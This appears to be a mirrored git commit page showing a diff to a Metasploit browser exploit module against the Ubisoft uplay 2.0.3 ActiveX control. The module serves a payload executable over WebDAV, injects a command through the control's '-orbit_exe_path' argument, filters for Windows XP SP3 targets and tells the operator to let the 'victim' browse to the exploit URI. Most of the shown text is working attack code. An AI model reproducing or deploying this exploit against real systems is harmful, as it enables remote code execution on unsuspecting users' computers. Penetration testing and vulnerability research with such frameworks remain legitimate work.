infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Lots of changes before commit.

unstable
sinn3r 2012-08-06 11:54:08 -05:00
parent 25b2b2de68
commit 69ff9e7c1c
1 changed files with 30 additions and 31 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

53
modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
## ##
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
@ -17,25 +13,14 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking
#:classid => "{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}" # Does not get registered in IE properly?
})
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Ubisoft uplay Active X Control Arbitrary Code Execution', 'Name' => 'Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution',
'Description' => %q{ 'Description' => %q{
The uplay ActiveX component allows an attacker to execute any command line action. The uplay ActiveX component allows an attacker to execute any command line action.
User must sign in, unless auto-sign in is enabled and uplay must not already be running. User must sign in, unless auto-sign in is enabled and uplay must not already be
running. Due to the way the malicious executable is served (WebDAV), the module
The exploit will request an exe payload over WebDAV, and must be running on port 80. must be run on port 80, so please make sure you have enough privilege to do that.
Tested in Win XP, does not appear to work in Win7.
Ubisoft released patch 2.04 as of Mon 20th July. Ubisoft released patch 2.04 as of Mon 20th July.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
@ -46,15 +31,15 @@ class Metasploit3 < Msf::Exploit::Remote
'phillips321 <phillips321[at]phillips321.co.uk>', 'phillips321 <phillips321[at]phillips321.co.uk>',
'Richard Hicks <scriptmonkeyblog[at]gmail.com>' 'Richard Hicks <scriptmonkeyblog[at]gmail.com>'
], ],
'Version' => '$Revision$',
'References' => 'References' =>
[ [
[ 'OSVDB', 'http://osvdb.org/show/osvdb/84402'],
[ 'URL', 'http://seclists.org/fulldisclosure/2012/Jul/375'] [ 'URL', 'http://seclists.org/fulldisclosure/2012/Jul/375']
], ],
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], [ 'Automatic', { } ]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 29 2012')) 'DisclosureDate' => 'Jul 29 2012'))
@ -66,11 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('EXPLOITPATH', [false, "The URI to use for the exploit"]) OptString.new('EXPLOITPATH', [false, "The URI to use for the exploit"])
], self.class) ], self.class)
deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH') # WebDAV does not support SSL and must run over port 80. # WebDAV does not support SSL and must run over port 80.
deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH')
@basename = rand_text_alpha(8)
@share_name = rand_text_alpha(8)
@extensions = "exe"
end end
def autofilter def autofilter
@ -81,6 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote
use_zlib use_zlib
end end
def is_exploitable?(req)
# Only engage Win XP SP3 targets
req.headers['User-Agent'] =~ /NT 5\.1/
end
def on_request_uri(cli, request) def on_request_uri(cli, request)
case request.method case request.method
when 'OPTIONS' when 'OPTIONS'
@ -89,7 +76,15 @@ class Metasploit3 < Msf::Exploit::Remote
process_propfind(cli, request) process_propfind(cli, request)
when 'GET' when 'GET'
if request.uri_parts['Resource'].include? @uplay_uri if request.uri_parts['Resource'].include? @uplay_uri
if is_exploitable?(request)
prompt_uplay(cli, request) prompt_uplay(cli, request)
else
print_error("Not the target we want, will not engage.")
resp = create_response(404, "Not Found")
resp.body = ""
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
end
else else
process_get(cli, request) process_get(cli, request)
end end
@ -409,6 +404,10 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
end end
def exploit def exploit
@basename = rand_text_alpha(8)
@share_name = rand_text_alpha(8)
@extensions = "exe"
if datastore['EXPLOITPATH'] if datastore['EXPLOITPATH']
@uplay_uri = datastore['EXPLOITPATH'] @uplay_uri = datastore['EXPLOITPATH']
else else
@ -424,7 +423,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
end end
vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe") vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe")
print_status("Exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}") print_good("Please let your victim browse to this exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}")
super super
end end